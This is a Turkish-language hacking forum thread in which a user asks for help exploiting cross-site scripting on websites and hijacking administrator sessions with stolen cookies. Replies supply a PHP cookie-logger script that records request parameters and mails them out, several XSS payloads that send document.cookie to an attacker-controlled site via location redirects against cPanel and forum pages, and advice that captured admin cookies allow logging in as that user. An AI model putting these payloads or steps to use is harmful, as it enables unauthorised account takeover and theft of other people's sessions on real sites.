Xss Yardım :S
-
merhaba arkadaşlar
dökümanları felan okudum. javascriptte basit işlemler yaptırabilcek kadar bilgim zaten var. denediğim 1-2 sitede " çalıştır. yani sayfada uyarı verdirebildim. cookie de alabildim ama aldığım cookileri kaydettiğim zaman kendi hesabımla giriyorum. bi de location komutunu deniyorum. arama gerçekleşince sayfa yönlenio ama sayfada kalıcı yönlenme söz konusu değil :S bi yerde takılıyorum elbet ama nerde :S şimdiden teşekkürler...
-
Sayfada uyarı verebiliyorumdan kastın alert çıkartıyorsun sanırım. Cookileri nereye kaydediyorsun ? Kendi cookilerini silip aldığın cookilerimi kaydediyorsun ? Firefox'dan mı?
-
firefox cookie editorle de yaptım, üzerine yazdırma yoluyla. ie de normal txt içinede yazdırdım. bu arada uyarıdan kastım evet alert. dier bi sorunum ise; yönlendirme kodu sayfada
çalışıo, kalıcı olması için ne yapmam lazım. :) -
<?php
$kayit = fopen("dosya.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("mailadresin@mail.com","password","",’From: color=#0000ffxxxx@mail.com’);
?>
chmod 777
Örnek :
:2082/login?user=**<SCRIPT>location.href= ". cookie)</script>
/users.php?f=1&s=1’<script>document.location=’http: //www.siten.com/xss/?’+escape(document.cookie)</script>&w=asc&d=50
comments.php?id=1"<script>document.location=’http: //www.siten.com/xss/?’+escape(document.cookie)</script>
/modules.php?f=1&s=1’<XML src= "">
:2082/login?user=**<SCRIPT>location.href= ". cookie)</script> -
cookie yi mail adresime almadan da okuyabiliyorum. ama kullanamıyorum :S bu arada 2.soru da hala şaşkın durumdaım :D
-
Hoja uzaktan kod çalıştırabilmen için kodu klasördeki dosyalardan birine entegre etmen gerekiyor. URL'ye kodu yazarak sayfayı istediğin şekilde (kalıcı) yönlendiremessin.
-
hmm tamam onu anladım. peki benim document.cookie ile aldıgım çerezler benim çerezlerim mi yoksa yöneticinin mi ? yöneticininse nasıl kullanabilirim :S çok denedim ama yapamadım :S
-
f1kr3t bunu yazdı:
-----------------------------
hmm tamam onu anladım. peki benim document.cookie ile aldıgım çerezler benim çerezlerim mi yoksa yöneticinin mi ? yöneticininse nasıl kullanabilirim :S çok denedim ama yapamadım :S
-----------------------------
Firefox'un ''Add N Edit Cookies'' eklentisini kullanabilirsin. -
Swool bunu yazdı:
-----------------------------
f1kr3t bunu yazdı:
-----------------------------
hmm tamam onu anladım. peki benim document.cookie ile aldıgım çerezler benim çerezlerim mi yoksa yöneticinin mi ? yöneticininse nasıl kullanabilirim :S çok denedim ama yapamadım :S
-----------------------------
Firefox'un ''Add N Edit Cookies'' eklentisini kullanabilirsin.
-----------------------------o eklentiyle çerezleri zaten değiştiriyorum ama çalışmıyo işte :S yani anlamak istediğim, çerezi gördüğümüz zaman onu kullanarak yönetici girişi yapabilmemiz mümkün mü ? eğer öleyse bi yardımcı olun lütfen :D çöziim şu olayı :D
-
f1kr3t bunu yazdı:
-----------------------------Swool bunu yazdı:
-----------------------------
f1kr3t bunu yazdı:
-----------------------------
hmm tamam onu anladım. peki benim document.cookie ile aldıgım çerezler benim çerezlerim mi yoksa yöneticinin mi ? yöneticininse nasıl kullanabilirim :S çok denedim ama yapamadım :S
-----------------------------
Firefox'un ''Add N Edit Cookies'' eklentisini kullanabilirsin.
-----------------------------o eklentiyle çerezleri zaten değiştiriyorum ama çalışmıyo işte :S yani anlamak istediğim, çerezi gördüğümüz zaman onu kullanarak yönetici girişi yapabilmemiz mümkün mü ? eğer öleyse bi yardımcı olun lütfen :D çöziim şu olayı :D
-----------------------------
Bazı scriptlerde güvenlik duvarı söz konusu olabiliyor. Normal koşullarda eğer cookiler yöneticiye aitse girişi o kullanıcı adıyla yapabilirsin.
